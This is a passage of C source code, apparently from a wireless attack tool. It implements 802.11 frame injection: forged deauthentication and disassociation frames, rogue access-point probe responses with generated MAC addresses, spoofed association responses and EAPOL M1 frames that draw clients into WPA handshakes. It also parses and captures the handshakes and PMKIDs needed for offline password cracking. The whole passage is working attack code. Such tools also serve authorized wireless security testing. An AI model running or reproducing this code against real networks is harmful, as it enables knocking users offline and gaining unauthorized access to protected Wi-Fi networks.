macclient, ETH_ALEN); memcpy(macftx->addr2, macap, ETH_ALEN); memcpy(macftx->addr3, macap, ETH_ALEN); macftx->sequence = seqcounter1++ << 4; if(seqcounter1 > 4095) seqcounter1 = 1; wltxnoackbuffer[RTHTXNOACK_SIZE + MAC_SIZE_NORM] = reason; if((write(fd_socket_tx, &wltxnoackbuffer, RTHTXNOACK_SIZE + MAC_SIZE_NORM + 2)) == RTHTXNOACK_SIZE + MAC_SIZE_NORM +2) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_disassociation_fm_client(const u8* macclient, const u8* macap, u8 reason) { macftx = (ieee80211_mac_t*)&wltxnoackbuffer[RTHTXNOACK_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DISASSOC; wltxnoackbuffer[RTHTXNOACK_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macap, ETH_ALEN); memcpy(macftx->addr2, macclient, ETH_ALEN); memcpy(macftx->addr3, macap, ETH_ALEN); macftx->sequence = seqcounter1++ << 4; if(seqcounter1 > 4095) seqcounter1 = 1; wltxnoackbuffer[RTHTXNOACK_SIZE + MAC_SIZE_NORM] = reason; if((write(fd_socket_tx, &wltxnoackbuffer, RTHTXNOACK_SIZE + MAC_SIZE_NORM + 2)) == RTHTXNOACK_SIZE + MAC_SIZE_NORM +2) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_deauthentication_fm_ap(const u8* macclient, const u8* macap, u8 reason) { macftx = (ieee80211_mac_t*)&wltxnoackbuffer[RTHTXNOACK_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DEAUTH; wltxnoackbuffer[RTHTXNOACK_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macclient, ETH_ALEN); memcpy(macftx->addr2, macap, ETH_ALEN); memcpy(macftx->addr3, macap, ETH_ALEN); macftx->sequence = seqcounter1++ << 4; if(seqcounter1 > 4095) seqcounter1 = 1; wltxnoackbuffer[RTHTXNOACK_SIZE +MAC_SIZE_NORM] = reason; if((write(fd_socket_tx, &wltxnoackbuffer, RTHTXNOACK_SIZE + MAC_SIZE_NORM + 2)) ==RTHTXNOACK_SIZE + MAC_SIZE_NORM +2) return; errorcount++; return; } /*---------------------------------------------------------------------------*/ static inline void send_80211_deauthentication_fm_client(const u8* macclient, const u8* macap, u8 reason) { macftx = (ieee80211_mac_t*)&wltxnoackbuffer[RTHTXNOACK_SIZE]; macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DEAUTH; wltxnoackbuffer[RTHTXNOACK_SIZE + 1] = 0; macftx->duration = 0x013a; memcpy(macftx->addr1, macap, ETH_ALEN); memcpy(macftx->addr2, macclient, ETH_ALEN); memcpy(macftx->addr3, macap, ETH_ALEN); macftx->sequence = seqcounter1++ << 4; if(seqcounter1 > 4095) seqcounter1 = 1; wltxnoackbuffer[RTHTXNOACK_SIZE + MAC_SIZE_NORM] = reason; if((write(fd_socket_tx, &wltxnoackbuffer, RTHTXNOACK_SIZE + MAC_SIZE_NORM + 2)) == RTHTXNOACK_SIZE + MAC_SIZE_NORM +2) return; errorcount++; return; } /*===========================================================================*/ /*===========================================================================*/ /* RX 802.11 */ static inline __attribute__((always_inline)) void get_tagvendor(infoelement_t *infoelement, int infolen, u8 *infostart) { static size_t c; static ieee80211_wpaie_t *iewpa; static ieee80211_wpasuite_t *wpasuite; static ieee80211_wpasuitecount_t *wpasuitecount; iewpa = (ieee80211_wpaie_t*)infostart; if(memcmp(&wpasuiteoui, iewpa->oui, 3) != 0) return; if(iewpa->type != 1) return; if(iewpa->version != 1) return; infostart += IEEE80211_WPAIE_SIZE; infolen -= IEEE80211_WPAIE_SIZE; wpasuite =(ieee80211_wpasuite_t*)infostart; if(memcmp(&wpasuiteoui, wpasuite->oui, 3) != 0) return; infostart += IEEE80211_WPASUITE_SIZE; infolen -= IEEE80211_WPASUITE_SIZE; wpasuitecount =(ieee80211_wpasuitecount_t*)infostart; infostart += IEEE80211_WPASUITECOUNT_SIZE; infolen -= IEEE80211_WPASUITECOUNT_SIZE; for(c = 0; c < wpasuitecount->count; c++) { if(infolen <= 0) return; wpasuite =(ieee80211_wpasuite_t*)infostart; infostart += IEEE80211_WPASUITE_SIZE; infolen -= IEEE80211_WPASUITE_SIZE; } wpasuitecount =(ieee80211_wpasuitecount_t*)infostart; infostart += IEEE80211_WPASUITECOUNT_SIZE; infolen -= IEEE80211_WPASUITECOUNT_SIZE; for(c = 0; c < wpasuitecount->count; c++) { if(infolen <= 0) return; wpasuite =(ieee80211_wpasuite_t*)infostart; if(memcmp(&wpasuiteoui, wpasuite->oui, 3) == 0) { if(wpasuite->type == WPA_AKM_PSK) infoelement->flags |= APWPAAKM_PSK; } infostart += IEEE80211_WPASUITE_SIZE; infolen -= IEEE80211_WPASUITE_SIZE; } return; } /*---------------------------------------------------------------------------*/ static inline __attribute__((always_inline)) void get_tagrsn(infoelement_t *infoelement, int infolen, u8 *infostart) { static size_t c; static ieee80211_rsnie_t *iersn; static ieee80211_rnsuite_t *rsnsuite; static ieee80211_rsnsuitecount_t *rsnsuitecount; static ieee80211_rsncapability_t *rsncapability; iersn = (ieee80211_rsnie_t*)infostart; if(iersn->version != 1) return; infostart += IEEE80211_RSNIE_SIZE; infolen -= IEEE80211_RSNIE_SIZE; rsnsuite =(ieee80211_rnsuite_t*)infostart; if(memcmp(&rsnsuiteoui, rsnsuite->oui, 3) != 0) return; if(rsnsuite->type == RSN_CS_CCMP) infoelement->flags |= APGS_CCMP; if(rsnsuite->type == RSN_CS_TKIP) infoelement->flags |= APGS_TKIP; infostart += IEEE80211_RSNSUITE_SIZE; infolen -= IEEE80211_RSNSUITE_SIZE; rsnsuitecount =(ieee80211_rsnsuitecount_t*)infostart; infostart += IEEE80211_RSNSUITECOUNT_SIZE; infolen -= IEEE80211_RSNSUITECOUNT_SIZE; for(c = 0; c < rsnsuitecount->count; c++) { if(infolen <= 0) return; rsnsuite =(ieee80211_rnsuite_t*)infostart; if(memcmp(&rsnsuiteoui, rsnsuite->oui, 3) == 0) { if(rsnsuite->type == RSN_CS_CCMP) infoelement->flags |= APCS_CCMP; if(rsnsuite->type == RSN_CS_TKIP) infoelement->flags |= APCS_TKIP; } infostart += IEEE80211_RSNSUITE_SIZE; infolen -= IEEE80211_RSNSUITE_SIZE; } rsnsuitecount =(ieee80211_rsnsuitecount_t*)infostart; infostart += IEEE80211_RSNSUITECOUNT_SIZE; infolen -= IEEE80211_RSNSUITECOUNT_SIZE; for(c = 0; c < rsnsuitecount->count; c++) { if(infolen <= 0) return; rsnsuite =(ieee80211_rnsuite_t*)infostart; if(memcmp(&rsnsuiteoui, rsnsuite->oui, 3) == 0) { if(rsnsuite->type == RSN_AKM_PSK) infoelement->flags |= APRSNAKM_PSK; if(rsnsuite->type == RSN_AKM_PSK256) infoelement->flags |= APRSNAKM_PSK256; if(rsnsuite->type == RSN_AKM_PSKFT) infoelement->flags |= APRSNAKM_PSKFT; } infostart += IEEE80211_RSNSUITE_SIZE; infolen -= IEEE80211_RSNSUITE_SIZE; } if(infolen < 2) return; rsncapability = (ieee80211_rsncapability_t*)infostart; if((rsncapability->capability & MFP_REQUIRED) == MFP_REQUIRED) infoelement->flags |= AP_MFP; return; } /*---------------------------------------------------------------------------*/ static inline __attribute__((always_inline)) void tagwalk_channel_essid_rsn(infoelement_t *infoelement, int infolen, u8 *infostart) { static ieee80211_ietag_t *infoptr; while(0 < infolen) { infoptr = (ieee80211_ietag_t*)infostart; if(infolen < (int)(infoptr->len + IEEE80211_IETAG_SIZE)) return; if(infoptr->id == TAG_SSID) { if((infoptr->len > 0) && (infoptr->len <= ESSID_MAX)) { infoelement->flags |= APIE_ESSID; infoelement->essidlen = infoptr->len; memcpy(infoelement->essid, &infoptr->ie[0], infoptr->len); } } else if(infoptr->id == TAG_CHAN) { if(infoptr->len == 1) infoelement->channel = (u16)infoptr->ie[0]; } else if(infoptr->id == TAG_RSN) { if(infoptr->len >= IEEE80211_RSNIE_LEN_MIN) get_tagrsn(infoelement, infoptr->len, infoptr->ie); } else if(infoptr->id == TAG_VENDOR) { if(infoptr->len >= IEEE80211_WPAIE_LEN_MIN) get_tagvendor(infoelement, infoptr->len, infoptr->ie); } infostart += infoptr->len + IEEE80211_IETAG_SIZE; infolen -= infoptr->len + IEEE80211_IETAG_SIZE; } return; } /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ static inline int get_keyinfo(u16 kyif) { if(kyif & WPA_KEY_INFO_ACK) { if(kyif & WPA_KEY_INFO_INSTALL) return 3; /* handshake 3 */ else return 1; /* handshake 1 */ } else { if(kyif & WPA_KEY_INFO_SECURE) return 4; /* handshake 4 */ else return 2; /* handshake 2 */ } return 0; } /*---------------------------------------------------------------------------*/ static inline void process80211pspoll(void) { static size_t i; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp(macfrx->addr1, (aplist + i)->macap, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); return; } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211action(void) { static size_t i; static ieee80211_action_t *action; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp((aplist + i)->macap, macfrx->addr1, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); break; } } action = (ieee80211_action_t*)payloadptr; if(payloadlen < (IEEE80211_ACTION_SIZE + IEEE80211_IETAG_SIZE)) return; if((action->category == RADIO_MEASUREMENT) && (action->code == NEIGHBOR_REPORT_REQUEST)) writeepb(); return; } /*---------------------------------------------------------------------------*/ static inline void process80211qosdata(void) { static size_t i; if((macfrx->to_ds != 1) && (macfrx->from_ds != 0)) return; for(i = 0; i < APLIST_MAX - 1; i++) { { if(memcmp((aplist + i)->macap, macfrx->addr1, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); return; } } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211qosnull(void) { static size_t i; if((macfrx->to_ds != 1) && (macfrx->from_ds != 0)) return; for(i = 0; i < APLIST_MAX - 1; i++) { { if(memcmp((aplist + i)->macap, macfrx->addr1, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); return; } } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211null(void) { static size_t i; if((macfrx->to_ds != 1) && (macfrx->from_ds != 0)) return; for(i = 0; i < APLIST_MAX - 1; i++) { { if(memcmp((aplist + i)->macap, macfrx->addr1, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); return; } } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211blockack(void) { static size_t i; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp((aplist + i)->macap, macfrx->addr1, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); return; } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211blockackreq(void) { static size_t i; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp((aplist + i)->macap, macfrx->addr1, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(memcmp(&macbc, (aplist + i)->macclient, ETH_ALEN) == 0) (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); return; } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211eap_start(void) { static size_t i; for(i = 0; i < CLIENTLIST_MAX - 1; i++) { if(memcmp(macfrx->addr2, (clientlist + i)->macclient, ETH_ALEN) != 0) continue; if(memcmp(macfrx->addr1, (clientlist + i)->macap, ETH_ALEN) != 0) continue; (clientlist + i)->tsakt = tsakt; (clientlist + i)->status |= CLIENT_EAP_START; if((clientlist + i)->count == 0) return; send_80211_eap_request_id(); (clientlist + i)->count -= 1; return; } return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapol_m4(void) { static size_t i; for(i = 0; i < APLIST_MAX -1; i++) { if(memcmp((aplist + i)->macap, macfrx->addr3, ETH_ALEN) == 0) { if((aplist + i)->status >= AP_EAPOL_M3) return; if(deauthenticationflag == true) { if(((aplist + i)->ie.flags & APAKM_MASK) == 0) { send_80211_disassociation_fm_ap((aplist + i)->macclient, (aplist + i)->macap, WLAN_REASON_DISASSOC_AP_BUSY); send_80211_disassociation_fm_client(macfrx->addr2, (aplist + i)->macap, WLAN_REASON_DISASSOC_STA_HAS_LEFT); } } memcpy((aplist + i)->macclient, macfrx->addr2, ETH_ALEN); qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_tsakt); return; } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapol_m3(void) { static size_t i; if((authseqakt.status & AP_EAPOL_M2) == AP_EAPOL_M2) { if(memcmp(&authseqakt.macap, macfrx->addr2, ETH_ALEN) == 0) { if(authseqakt.replaycountm2 == (be64toh(wpakey->replaycount) - 1)) { if(authseqakt.kdv2 == kdv) { if((tsakt - tshold) < EAPOLM3TIMEOUT) { if(memcmp(&authseqakt.noncem1, &wpakey->nonce[28], 4) == 0) { for(i = 0; i < APLIST_MAX -1; i++) { if(memcmp((aplist + i)->macap, authseqakt.macap, ETH_ALEN) == 0) { (aplist + i)->tsakt = tsakt; authseqakt.status = 0; (aplist + i)->status |= AP_EAPOL_M3; return; } } } } } } } } authseqakt.status = 0; return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapol_m2rg(void) { size_t i; authseqakt.status = 0; writeepbm1(); for(i = 0; i < CLIENTLIST_MAX - 1; i++) { if(memcmp(macfrx->addr2, (clientlist + i)->macclient, ETH_ALEN) != 0) continue; if(memcmp(macfrx->addr1, (clientlist + i)->macap, ETH_ALEN) != 0) continue; (clientlist + i)->tsakt = tsakt; (clientlist + i)->status |= CLIENT_EAPOL_M2; if((clientlist + i)->count == 0) return; if(memcmp((clientlist + i)->mic, &wpakey->keymic[0], 4) == 0) send_80211_disassociation_fm_ap(macfrx->addr2, macfrx->addr1, WLAN_REASON_PREV_AUTH_NOT_VALID); memcpy((clientlist + i)->mic, &wpakey->keymic[0], 4); (clientlist + i)->count -= 1; return; } return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapol_m2(void) { authseqakt.replaycountm2 = be64toh(wpakey->replaycount); if(replaycountrg == authseqakt.replaycountm2) { process80211eapol_m2rg(); return; } if((authseqakt.status & AP_EAPOL_M1) == AP_EAPOL_M1) { if(memcmp(&authseqakt.macap, macfrx->addr1, ETH_ALEN) == 0) { if(authseqakt.replaycountm1 == authseqakt.replaycountm2) { authseqakt.kdv2 = kdv; if(authseqakt.kdv1 == authseqakt.kdv2) { if((tsakt - tshold) < EAPOLM2TIMEOUT) authseqakt.status |= AP_EAPOL_M2; else authseqakt.status = 0; return; } } } } authseqakt.status = 0; return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapol_m1(void) { static size_t i; memset(&authseqakt, 0, AUTHSEQAKT_SIZE); memcpy(&authseqakt.macap, macfrx->addr2, ETH_ALEN); authseqakt.kdv1 = kdv; authseqakt.replaycountm1 = be64toh(wpakey->replaycount); memcpy(&authseqakt.noncem1, &wpakey->nonce[28], 4); authseqakt.status = AP_EAPOL_M1; if(ntohs(wpakey->wpadatalen) == IEEE80211_PMKID_SIZE) { pmkid = (ieee80211_pmkid_t*)(eapolplptr + IEEE80211_WPAKEY_SIZE); if(memcmp(&rsnsuiteoui, pmkid->oui, 3) == 0) { if(pmkid->len >= 0x14) { if(pmkid->type == PMKID_KDE) { if(memcmp(pmkid->pmkid, &zeroed, PMKID_MAX) != 0) authseqakt.status |= AP_PMKID; } } } } for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp((aplist + i)->macap, authseqakt.macap, ETH_ALEN) == 0) { if(((aplist + i)->status & AP_PMKID) == AP_PMKID) return; (aplist + i)->status |= authseqakt.status; (aplist + i)->tsakt = tsakt; return; } } return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapol(void) { eapolplptr = eapauthplptr + IEEE80211_EAPAUTH_SIZE; eapolpllen = eapauthpllen - IEEE80211_EAPAUTH_SIZE; if((eapolpllen + IEEE80211_EAPAUTH_SIZE + IEEE80211_LLC_SIZE) > payloadlen) return; wpakey = (ieee80211_wpakey_t*)eapolplptr; if((kdv = ntohs(wpakey->keyinfo) & WPA_KEY_INFO_TYPE_MASK) == 0) return; keyinfo = (get_keyinfo(ntohs(wpakey->keyinfo))); switch(keyinfo) { case M1: process80211eapol_m1(); break; case M2: process80211eapol_m2(); break; case M3: process80211eapol_m3(); break; case M4: if(deauthenticationflag == true) process80211eapol_m4(); break; } return; } /*---------------------------------------------------------------------------*/ static inline void process80211eapauthentication(void) { tshold = tsakt; eapauthplptr = payloadptr + IEEE80211_LLC_SIZE; eapauthpllen = payloadlen - IEEE80211_LLC_SIZE; eapauth = (ieee80211_eapauth_t*)eapauthplptr; eapauthlen = ntohs(eapauth->len); if(eapauthlen > (eapauthpllen - IEEE80211_EAPAUTH_SIZE)) return; if(eapauth->type == EAPOL_KEY) process80211eapol(); else if(eapauth->type == EAPOL_START) process80211eap_start(); writeepb(); return; } /*---------------------------------------------------------------------------*/ static inline void process80211reassociationresponse(void) { tshold = tsakt; memcpy(&authseqakt.macap, macfrx->addr2, ETH_ALEN); return; } /*---------------------------------------------------------------------------*/ static inline void process80211reassociationrequest(void) { static size_t i; static ieee80211_reassoc_req_t *reassociationrequest; static u16 reassociationrequestlen; tshold = tsakt; reassociationrequest = (ieee80211_reassoc_req_t*)payloadptr; if((reassociationrequestlen = payloadlen - IEEE80211_REASSOCIATIONREQUEST_SIZE) < IEEE80211_IETAG_SIZE) return; memcpy(&authseqakt.macap, macfrx->addr1, ETH_ALEN); for(i = 0; i < CLIENTLIST_MAX - 1; i++) { if(memcmp(macfrx->addr2, (clientlist + i)->macclient, ETH_ALEN) != 0) continue; if(memcmp(macfrx->addr1, (clientlist + i)->macap, ETH_ALEN) != 0) continue; (clientlist + i)->tsakt = tsakt; if((clientlist + i)->count == 0) return; if((tsakt - (clientlist + i)->tsassoc) > TIMEREASSOCWAIT) { tagwalk_channel_essid_rsn(&(clientlist + i)->ie, reassociationrequestlen, reassociationrequest->ie); if(((clientlist + i)->ie.flags & APRSNAKM_PSK) != 0) { send_80211_reassociationresponse((clientlist + i)->aid++); if((clientlist + i)->aid > 0xff) (clientlist + i)->aid = 1; send_80211_eapol_m1(); (clientlist + i)->count -= 1; } else (clientlist + i)->count = 0; writeepb(); } (clientlist + i)->tsassoc = tsakt; return; } memset((clientlist + i), 0, CLIENTLIST_SIZE); (clientlist + i)->tsakt = tsakt; (clientlist + i)->tsassoc = tsfirst; (clientlist + i)->tsreassoc = tsfirst; (clientlist + i)->count = attemptclientmax; (clientlist + i)->aid = 1; memcpy((clientlist + i)->macclient, macfrx->addr2, ETH_ALEN); memcpy((clientlist + i)->macap, macfrx->addr1, ETH_ALEN); tagwalk_channel_essid_rsn(&(clientlist + i)->ie, reassociationrequestlen, reassociationrequest->ie); if((((clientlist + i)->ie.flags & APRSNAKM_PSK) != 0) && (attemptclientmax > 0)) { send_80211_reassociationresponse((clientlist + i)->aid++); send_80211_eapol_m1(); } else (clientlist + i)->count = 0; qsort(clientlist, i + 1, CLIENTLIST_SIZE, sort_clientlist_by_tsakt); writeepb(); return; } /*---------------------------------------------------------------------------*/ static inline void process80211associationresponse(void) { tshold = tsakt; memcpy(&authseqakt.macap, macfrx->addr2, ETH_ALEN); return; } /*---------------------------------------------------------------------------*/ static inline void process80211associationrequest(void) { static size_t i; static ieee80211_assoc_req_t *associationrequest; static u16 associationrequestlen; tshold = tsakt; associationrequest = (ieee80211_assoc_req_t*)payloadptr; if((associationrequestlen = payloadlen - IEEE80211_ASSOCIATIONREQUEST_SIZE) < IEEE80211_IETAG_SIZE) return; memcpy(&authseqakt.macap, macfrx->addr1, ETH_ALEN); for(i = 0; i < CLIENTLIST_MAX - 1; i++) { if(memcmp(macfrx->addr2, (clientlist + i)->macclient, ETH_ALEN) != 0) continue; if(memcmp(macfrx->addr1, (clientlist + i)->macap, ETH_ALEN) != 0) continue; (clientlist + i)->tsakt = tsakt; if((clientlist + i)->count == 0) return; tagwalk_channel_essid_rsn(&(clientlist + i)->ie, associationrequestlen, associationrequest->ie); if((tsakt - (clientlist + i)->tsassoc) > TIMEASSOCWAIT) { if(((clientlist + i)->ie.flags & APRSNAKM_PSK) != 0) { send_80211_associationresponse(); send_80211_eapol_m1(); (clientlist + i)->count -= 1; } else (clientlist + i)->count = 0; writeepb(); } (clientlist + i)->tsassoc = tsakt; return; } memset((clientlist + i), 0, CLIENTLIST_SIZE); (clientlist + i)->tsakt = tsakt; (clientlist + i)->tsassoc = tsfirst; (clientlist + i)->tsreassoc = tsfirst; (clientlist + i)->count = attemptclientmax; memcpy((clientlist + i)->macclient, macfrx->addr2, ETH_ALEN); memcpy((clientlist + i)->macap, macfrx->addr1, ETH_ALEN); tagwalk_channel_essid_rsn(&(clientlist + i)->ie, associationrequestlen, associationrequest->ie); if((((clientlist + i)->ie.flags & APRSNAKM_PSK) != 0) && (attemptclientmax > 0)) { send_80211_associationresponse(); send_80211_eapol_m1(); } else (clientlist + i)->count = 0; qsort(clientlist, i + 1, CLIENTLIST_SIZE, sort_clientlist_by_tsakt); writeepb(); return; } /*---------------------------------------------------------------------------*/ static inline void process80211authentication_fmclient(void) { size_t i; for(i = 0; i < CLIENTLIST_MAX - 1; i++) { if(memcmp(macfrx->addr2, (clientlist + i)->macclient, ETH_ALEN) != 0) continue; if(memcmp(macfrx->addr1, (clientlist + i)->macap, ETH_ALEN) != 0) continue; (clientlist + i)->tsakt = tsakt; if((clientlist + i)->count == 0) return; if((tsakt - (clientlist + i)->tsauth) > TIMEAUTHWAIT) { send_80211_authenticationresponse(); writeepb(); } (clientlist + i)->tsauth = tsakt; return; } memset((clientlist + i), 0, CLIENTLIST_SIZE); (clientlist + i)->tsakt = tsakt; (clientlist + i)->tsauth = tsfirst; (clientlist + i)->tsassoc = tsfirst; (clientlist + i)->tsreassoc = tsfirst; (clientlist + i)->count = attemptclientmax; memcpy((clientlist + i)->macclient, macfrx->addr2, ETH_ALEN); memcpy((clientlist + i)->macap, macfrx->addr1, ETH_ALEN); if(attemptclientmax > 0) send_80211_authenticationresponse(); qsort(clientlist, i + 1, CLIENTLIST_SIZE, sort_clientlist_by_tsakt); writeepb(); return; } /*---------------------------------------------------------------------------*/ static inline void process80211authentication(void) { size_t i; static ieee80211_auth_t *auth; tshold = tsakt; auth = (ieee80211_auth_t*)payloadptr; if(payloadlen < IEEE80211_AUTH_SIZE) return; if(auth->algorithm == OPEN_SYSTEM) { if(auth->sequence == 1) process80211authentication_fmclient(); else if(auth->sequence == 2) { if(memcmp(&macclientrg, macfrx->addr1, 3) == 0) { for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp((aplist + i)->macap, macfrx->addr2, ETH_ALEN) == 0) { (aplist + i)->tsakt = tsakt; (aplist + i)->status |= AP_IN_RANGE; if((tsakt - (aplist + i)->tsauth) > TIMEAUTHWAIT) { if(((aplist + i)->ie.flags & APRSNAKM_PSK) != 0) send_80211_associationrequest(i); writeepb(); } (aplist + i)->tsauth = tsakt; break; } } } } } return; } /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ static void get_tag(u8 ietag, essid_t *essid, int infolen, u8 *infostart) { static ieee80211_ietag_t *infoptr; while(0 < infolen) { infoptr = (ieee80211_ietag_t*)infostart; if(infolen < (int)(infoptr->len + IEEE80211_IETAG_SIZE)) return; if(infoptr->id == ietag) { essid->len = infoptr->len; essid->essid = (u8*)infoptr->ie; return; } infostart += infoptr->len + IEEE80211_IETAG_SIZE; infolen -= infoptr->len + IEEE80211_IETAG_SIZE; } return; } /*---------------------------------------------------------------------------*/ static inline void process80211proberequest_directed(void) { static size_t i; static ieee80211_proberequest_t *proberequest; static u16 proberequestlen; static essid_t essid; proberequest = (ieee80211_proberequest_t*)payloadptr; if((proberequestlen = payloadlen - IEEE80211_PROBERESPONSE_SIZE) < IEEE80211_IETAG_SIZE) return; get_tag(TAG_SSID, &essid, proberequestlen, proberequest->ie); if(attemptclientmax > 0) send_80211_probereresponse(macfrx->addr2, macfrx->addr1, essid.len, essid.essid); for(i = 0; i < MACLIST_MAX - 1; i++) { if(memcmp(macfrx->addr1, (maclist + i)->mac, ETH_ALEN) != 0) continue; (maclist + i)->tsakt = tsakt; return; } (maclist + i)->tsakt = tsakt; memcpy((maclist + i)->mac, macfrx->addr1, ETH_ALEN); qsort(maclist, i + 1, MACLIST_SIZE, sort_maclist_by_tsakt); writeepb(); return; } /*---------------------------------------------------------------------------*/ static inline void process80211proberequest_undirected(void) { static size_t i; static ieee80211_proberequest_t *proberequest; static u16 proberequestlen; static essid_t essid; proberequest = (ieee80211_proberequest_t*)payloadptr; if((proberequestlen = payloadlen - IEEE80211_PROBERESPONSE_SIZE) < IEEE80211_IETAG_SIZE) return; get_tag(TAG_SSID, &essid, proberequestlen, proberequest->ie); if(essid.len == 0) { if(proberesponseindex >= proberesponsetxmax) proberesponseindex = 0; if((aprglist + proberesponseindex)->essidlen == 0) proberesponseindex = 0; if(attemptclientmax > 0) send_80211_probereresponse(macfrx->addr2, (aprglist + proberesponseindex)->macaprg, (aprglist + proberesponseindex)->essidlen, (aprglist + proberesponseindex)->essid); proberesponseindex++; return; } for(i = 0; i < APRGLIST_MAX - 1; i++) { if((aprglist + i)->essidlen != essid.len) continue; if(memcmp((aprglist + i)->essid, essid.essid, essid.len) != 0) continue; (aprglist + i)->tsakt = tsakt; if(attemptclientmax > 0) send_80211_probereresponse(macfrx->addr2, (aprglist + i)->macaprg, essid.len, essid.essid); return; } memset((aprglist + i), 0, APRGLIST_SIZE); (aprglist + i)->tsakt = tsakt; (aprglist + i)->essidlen = essid.len; memcpy((aprglist + i)->essid, essid.essid, essid.len); (aprglist + i)->macaprg[5] = nicaprg & 0xff; (aprglist + i)->macaprg[4] = (nicaprg >> 8) & 0xff; (aprglist + i)->macaprg[3] = (nicaprg >> 16) & 0xff; (aprglist + i)->macaprg[2] = ouiaprg & 0xff; (aprglist + i)->macaprg[1] = (ouiaprg >> 8) & 0xff; (aprglist + i)->macaprg[0] = (ouiaprg >> 16) & 0xff; nicaprg++; if(attemptclientmax > 0) send_80211_probereresponse(macfrx->addr2, (aprglist + i)->macaprg, essid.len, essid.essid); qsort(aprglist, i + 1, APRGLIST_SIZE, sort_aprglist_by_tsakt); writeepb(); return; } /*---------------------------------------------------------------------------*/ /*---------------------------------------------------------------------------*/ static inline void process80211proberesponse_rca(void) { static size_t i; static ieee80211_beacon_proberesponse_t *proberesponse; static u16 proberesponselen; proberesponse = (ieee80211_beacon_proberesponse_t*)payloadptr; if((proberesponselen = payloadlen - IEEE80211_PROBERESPONSE_SIZE) < IEEE80211_IETAG_SIZE) return; for(i = 0; i < APLIST_MAX - 1; i++) { if(memcmp(macfrx->addr3, (aplist + i)->macap, ETH_ALEN) != 0) continue; if(memcmp(&macclientrg, macfrx->addr1, 3) == 0) (aplist + i)->tsauth = tsakt; if(((aplist + i)->status & AP_PROBERESPONSE) == 0) (aplist + i)->status |= AP_PROBERESPONSE; tagwalk_channel_essid_rsn(&(aplist + i)->ie, proberesponselen, proberesponse->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if(((aplist + i)->ie.flags & APIE_ESSID) == APIE_ESSID) (aplist + i)->status |= AP_ESSID; (aplist + i)->count = (scanlist + scanlistindex)->frequency; return; } memset((aplist + i), 0, APLIST_SIZE); (aplist + i)->tsakt = tsakt; (aplist + i)->tshold1 = tsakt; (aplist + i)->tsauth = tsfirst; (aplist + i)->count = attemptapmax; memcpy((aplist + i)->macap, macfrx->addr3, ETH_ALEN); memcpy((aplist + i)->macclient, &macbc, ETH_ALEN); (aplist + i)->status |= AP_PROBERESPONSE; tagwalk_channel_essid_rsn(&(aplist + i)->ie, proberesponselen, proberesponse->ie); if((aplist + i)->ie.channel == 0) (aplist + i)->ie.channel = (scanlist + scanlistindex)->channel; if((aplist + i)->ie.channel != (scanlist + scanlistindex)->channel) return; if(((aplist + i)->ie.flags & APIE_ESSID) == APIE_ESSID) (aplist + i)->status |= AP_ESSID; (aplist + i)->count = (scanlist + scanlistindex)->frequency; qsort(aplist, i + 1, APLIST_SIZE, sort_aplist_by_tsakt); return; } /*---------------------------------------------------------------------------*/ static inline void process80211proberesponse(void) { static size_t i; static ieee80211_beacon_proberesponse_t *proberesponse; static u16 proberesponselen; proberesponse = 